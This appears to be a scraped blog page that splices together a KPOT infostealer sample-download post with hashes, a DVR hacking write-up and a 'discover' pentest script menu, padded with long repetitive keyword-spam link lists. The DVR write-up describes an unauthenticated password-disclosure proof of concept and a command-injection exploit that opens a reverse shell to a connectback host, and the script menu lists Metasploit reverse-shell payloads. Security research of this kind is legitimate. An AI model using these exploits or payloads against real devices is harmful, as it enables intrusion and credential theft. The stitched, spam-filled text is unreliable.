Sunday, August 30, 2020

KPOT Info Stealer Samples


KPOT Stealer is a "stealer" malware that focuses on stealing account information and other data from various software applications and services

References

1.  2020-04-19 Didier Stevens posted analysis of KPOT infostealer on the Infosec Handlers Diary blog "KPOT Analysis: Obtaining the Decrypted KPOT EXE"
These are samples to follow his analysis routine.

2. 2019-05-09 Proofpoint. New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials


Download

             Other malware




Download. Email me if you need the password (see in my profile)




Hashes

1. From Didier Stevens' post

MD5  56ad7b243511ee7398d43df7643dc904
SHA-1  ae5ab7798ca267b1265a0496c562f219821d17cf
SHA-256  3fd4aa339bdfee23684ff495d884aa842165e61af85fd09411abfd64b9780146

2. From Proofpoint

MD5 7d7667ddce8fd69a0fd50bb08c287d10
SHA-1 087fc3e9a082983ee6a2b25f0ccb09eb723e0f39

SHA-256 67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d

MD5 45ddc687f88b45fc3fec79f9dc8b38e2
SHA-1 de37b748e0e32d96c31f469f9ba4ea4f11e3e78b
SHA-256 36dcd40aee6a42b8733ec3390501502824f570a23640c2c78a788805164f77cecontagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip

Related posts


  1. Hacking Tools 2019
  2. Hack Rom Tools
  3. Beginner Hacker Tools
  4. Free Pentest Tools For Windows
  5. Hacker Tools Hardware
  6. Hacking Tools Usb
  7. Free Pentest Tools For Windows
  8. Hackers Toolbox
  9. Hacker Tools 2019
  10. Hack Tools
  11. Top Pentest Tools
  12. Tools For Hacker
  13. Hacking Tools Windows
  14. Nsa Hacker Tools
  15. Pentest Tools Website
  16. Blackhat Hacker Tools
  17. Hacker Tools For Mac
  18. Hack And Tools
  19. Hacking Tools For Windows
  20. Hacking Tools For Pc
  21. Hacking Tools Windows 10
  22. Hack Tools For Mac
  23. Hacking Tools Software
  24. Pentest Tools Find Subdomains
  25. Easy Hack Tools
  26. Hacker Tools Online
  27. Nsa Hacker Tools
  28. Tools 4 Hack
  29. Blackhat Hacker Tools
  30. Pentest Automation Tools
  31. Pentest Tools Framework
  32. Nsa Hacker Tools
  33. Hacking Tools Free Download
  34. Hack And Tools
  35. Black Hat Hacker Tools
  36. Hacking Tools For Kali Linux
  37. Hacking Tools Name
  38. Tools Used For Hacking
  39. Hacker Tools 2019
  40. Hack Tools Github
  41. Hack Rom Tools
  42. Hack Tools For Pc
  43. Pentest Tools Online
  44. Hacker Tools For Pc
  45. Hacking Tools For Windows
  46. Hacking Tools And Software
  47. Hacker Tools Linux
  48. Hacking Apps
  49. Hacker Tools For Mac
  50. Pentest Tools Website
  51. Github Hacking Tools
  52. Hacker
  53. Pentest Tools For Android
  54. Hacking Tools 2019
  55. How To Hack
  56. Hack Tools
  57. Hacking Tools Windows 10
  58. Hacking Tools 2019
  59. Hack Tools Github
  60. Pentest Tools Website Vulnerability
  61. Hack Tools For Pc
  62. Pentest Box Tools Download
  63. What Are Hacking Tools
  64. Hack Tools 2019
  65. Hacker Tools Online
  66. Pentest Tools Online
  67. Free Pentest Tools For Windows
  68. Best Hacking Tools 2020
  69. Computer Hacker
  70. Pentest Tools Alternative
  71. Black Hat Hacker Tools
  72. Hacking Tools For Windows 7
  73. How To Make Hacking Tools
  74. Hacking Tools And Software
  75. Hacking Tools For Pc
  76. Pentest Tools Framework
  77. Hacking Tools For Mac
  78. Tools 4 Hack
  79. Pentest Tools Windows
  80. Hacker Search Tools
  81. Hacking Tools For Kali Linux
  82. Install Pentest Tools Ubuntu
  83. Pentest Tools Download
  84. Hack Tool Apk
  85. Pentest Tools Bluekeep
  86. World No 1 Hacker Software
  87. Underground Hacker Sites
  88. Top Pentest Tools

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.
Continue reading

Discover: A Custom Bash Scripts Used To Perform Pentesting Tasks With Metasploit


About discover: discover is a custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit Framework. For use with Kali Linux, Parrot Security OS and the Penetration Testers Framework (PTF).

About authors:


discover Installation and Updating


About RECON in discover
   Domain

RECON

1. Passive

2. Active
3. Import names into an existing recon-ng workspace
4. Previous menu

   Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit Framework, URLCrazy, Whois, multiple websites, and recon-ng.

   Active uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng.
   [*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, Hunter, SecurityTrails, and Shodan for maximum results with recon-ng and theHarvester.

API key locations:

recon-ng
   show keys
   keys add bing_api <value>

theHarvester
   /opt/theHarvester/api-keys.yaml

   Person: Combines info from multiple websites.

RECON

First name:

Last name:

   Parse salesforce: Gather names and positions into a clean list.

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list:

About SCANNING in discover
   Generate target list: Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

SCANNING

1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu


   CIDR, List, IP, Range, or URL

Type of scan:

1. External

2. Internal
3. Previous menu

  • External scan will set the nmap source port to 53 and the max-rrt-timeout to 1500ms.
  • Internal scan will set the nmap source port to 88 and the max-rrt-timeout to 500ms.
  • Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
  • Matching nmap scripts are used for additional enumeration.
  • Addition tools: enum4linux, smbclient, and ike-scan.
  • Matching Metasploit auxiliary modules are also leveraged.

About WEB in discover
   Insecure direct object reference

Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.

Paste the results into a new file.


Enter the location of your file:

   Open multiple tabs in Firefox

Open multiple tabs in Firefox with:

1. List

2. Directories from robots.txt.
3. Previous menu

  • Use a list containing IPs and/or URLs.
  • Use wget to pull a domain's robot.txt file, then open all of the directories.

   Nikto

Run multiple instances of Nikto in parallel.

1. List of IPs.
2. List of IP:port.
3. Previous menu

   SSL: Use sslscan and sslyze to check for SSL/TLS certificate issues.

Check for SSL certificate issues.

Enter the location of your list:


About MISC in discover
   Parse XML

Parse XML to CSV.

1. Burp (Base64)

2. Nessus (.nessus)
3. Nexpose (XML 2.0)
4. Nmap
5. Qualys
6. revious menu

   Generate a malicious payload

Malicious Payloads

1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp (Linux)
4. java/jsp_shell_reverse_tcp (Windows)
5. linux/x64/meterpreter_reverse_https
6. linux/x64/meterpreter_reverse_tcp
7. linux/x64/shell/reverse_tcp
8. osx/x64/meterpreter_reverse_https
9. osx/x64/meterpreter_reverse_tcp
10. php/meterpreter/reverse_tcp
11. python/meterpreter_reverse_https 12. python/meterpreter_reverse_tcp
13. windows/x64/meterpreter_reverse_https
14. windows/x64/meterpreter_reverse_tcp
15. Previous menu

   Start a Metasploit listener

Metasploit Listeners

1. android/meterpreter/reverse_tcp
2. cmd/windows/reverse_powershell
3. java/jsp_shell_reverse_tcp
4. linux/x64/meterpreter_reverse_https
5. linux/x64/meterpreter_reverse_tcp
6. linux/x64/shell/reverse_tcp
7. osx/x64/meterpreter_reverse_https
8. osx/x64/meterpreter_reverse_tcp
9. php/meterpreter/reverse_tcp
10. python/meterpreter_reverse_https
11. python/meterpreter_reverse_tcp
12. windows/x64/meterpreter_reverse_https
13. windows/x64/meterpreter_reverse_tcp
14. Previous menu


Read more
  1. Hacker Tools For Mac
  2. Hacking App
  3. Hacking Tools For Windows Free Download
  4. Hacking Tools And Software
  5. Hackrf Tools
  6. Hackers Toolbox
  7. Hacking Tools For Beginners
  8. Pentest Recon Tools
  9. Hack Tools For Ubuntu
  10. Hacks And Tools
  11. Pentest Recon Tools
  12. Hacker Tools For Mac
  13. Hak5 Tools
  14. Pentest Reporting Tools
  15. Free Pentest Tools For Windows
  16. Hacking Tools Online
  17. Hacking Tools For Kali Linux
  18. Hacker Tools Apk
  19. Pentest Tools Website Vulnerability
  20. Pentest Tools Apk
  21. Hack And Tools
  22. Hacker Tools 2019
  23. Hacking Tools Windows 10
  24. Pentest Tools Alternative
  25. Hacker Tools For Windows
  26. Pentest Tools Bluekeep
  27. Hacking Tools For Mac
  28. Pentest Tools For Ubuntu
  29. Pentest Tools For Windows
  30. Hacking Tools For Pc
  31. Hack Tools For Windows
  32. Install Pentest Tools Ubuntu
  33. Hacking Tools Name
  34. Hacking Tools For Windows 7
  35. Hack Tools Online
  36. Hacking Tools Pc
  37. Pentest Tools Android
  38. Pentest Tools For Windows
  39. Hacker Tools 2020
  40. Hacking Tools Download
  41. Pentest Tools Port Scanner
  42. Hacking Tools For Mac
  43. Hacking Tools Online
  44. Hack Tools For Pc
  45. Pentest Tools Framework
  46. Hacker Tools Online
  47. Pentest Tools For Android
  48. Pentest Tools List
  49. Hackers Toolbox
  50. Pentest Tools Find Subdomains
  51. Hacker Tools Hardware
  52. Pentest Recon Tools
  53. Hacking Tools Github
  54. Pentest Tools Tcp Port Scanner
  55. Hacking Tools For Windows Free Download
  56. Hacker Tools List
  57. Pentest Tools Website Vulnerability
  58. Hacking Tools Name
  59. Pentest Tools Open Source
  60. Pentest Tools Alternative
  61. World No 1 Hacker Software
  62. Hacker Tools Mac
  63. Hacking Tools For Windows Free Download
  64. Tools For Hacker
  65. Best Pentesting Tools 2018
  66. Easy Hack Tools
  67. Black Hat Hacker Tools
  68. Pentest Tools List
  69. Hack Tools For Ubuntu
  70. Hacking Tools Mac
  71. Pentest Tools For Ubuntu
  72. Physical Pentest Tools
  73. Hacking Tools Mac
  74. Hack Tool Apk
  75. Hacking Tools Hardware
  76. World No 1 Hacker Software
  77. Top Pentest Tools
  78. Pentest Tools
  79. Physical Pentest Tools
  80. Pentest Automation Tools
  81. Hacking Tools For Windows
  82. Hacker Tools 2020
  83. Hacking Tools Free Download
  84. Hacker Tools For Mac
  85. What Are Hacking Tools
  86. Free Pentest Tools For Windows
  87. Pentest Tools For Android
  88. Hacking Tools Kit
  89. Pentest Tools Tcp Port Scanner
  90. Hacking Tools And Software
  91. Pentest Tools Framework
  92. Pentest Automation Tools
  93. Best Hacking Tools 2020
  94. Hack Tools For Games
  95. Hak5 Tools
  96. Hacker Tools Apk
  97. Hack Tools For Mac
  98. Hacking Tools And Software
  99. Hak5 Tools
  100. Hak5 Tools
  101. Hacker Tools Github
  102. Pentest Tools Framework
  103. Hacking Tools For Mac
  104. Pentest Tools List
  105. Easy Hack Tools
  106. Install Pentest Tools Ubuntu
  107. Hak5 Tools
  108. Hacker Tools Windows
  109. Pentest Tools Framework
  110. Game Hacking
  111. Github Hacking Tools
  112. Physical Pentest Tools
  113. Hacking Tools Download
  114. Hacker Hardware Tools
  115. Hacking Tools And Software
  116. New Hacker Tools
  117. Hacker Tools Github
  118. How To Install Pentest Tools In Ubuntu
  119. Hacker Security Tools
  120. Hacking Tools For Windows Free Download
  121. Pentest Tools For Windows
  122. Hacking Tools Kit
  123. Hacking Tools Kit
  124. Top Pentest Tools
  125. Hak5 Tools
  126. Hacker Security Tools
  127. Hacker Techniques Tools And Incident Handling
  128. Hacking Tools Pc
  129. Hacking Tools Usb
  130. Hacking Tools Usb
  131. Hacking Tools For Kali Linux
  132. Pentest Tools
  133. Best Hacking Tools 2020
  134. Hack Tools Github
  135. Hacker Tools Mac
  136. How To Install Pentest Tools In Ubuntu
  137. Hacking Tools For Windows Free Download
  138. Pentest Tools
  139. Pentest Tools Free
  140. Pentest Reporting Tools
  141. Hack And Tools
  142. Hacking Tools Name
  143. Hack App
  144. Github Hacking Tools
  145. Hacker Tool Kit
  146. Hacking App
  147. Hack Tools
  148. Pentest Tools List
  149. Hacker Tools For Ios
  150. Pentest Tools Windows
  151. Pentest Tools Tcp Port Scanner
  152. Hacking Tools 2020
  153. Hacker Tools For Ios
  154. What Are Hacking Tools
  155. Nsa Hacker Tools
  156. Hacker Tools 2020
  157. Hack Rom Tools
  158. Top Pentest Tools
  159. Hacking Tools Free Download
  160. Nsa Hacker Tools
  161. Hak5 Tools
  162. Hacking Tools For Mac
  163. Pentest Tools Android
  164. Pentest Box Tools Download
  165. Pentest Tools Linux
  166. Hack Tools Pc
  167. Hack Tool Apk No Root
  168. Growth Hacker Tools
  169. Hack Tools Pc
  170. Pentest Tools Alternative
  171. Hacking Tools Name
  172. Hacking Tools Github
  173. Hacking Tools For Beginners
  174. Pentest Tools Windows
  175. Hacker Tools Linux
  176. Hacker Tools Software
  177. Pentest Recon Tools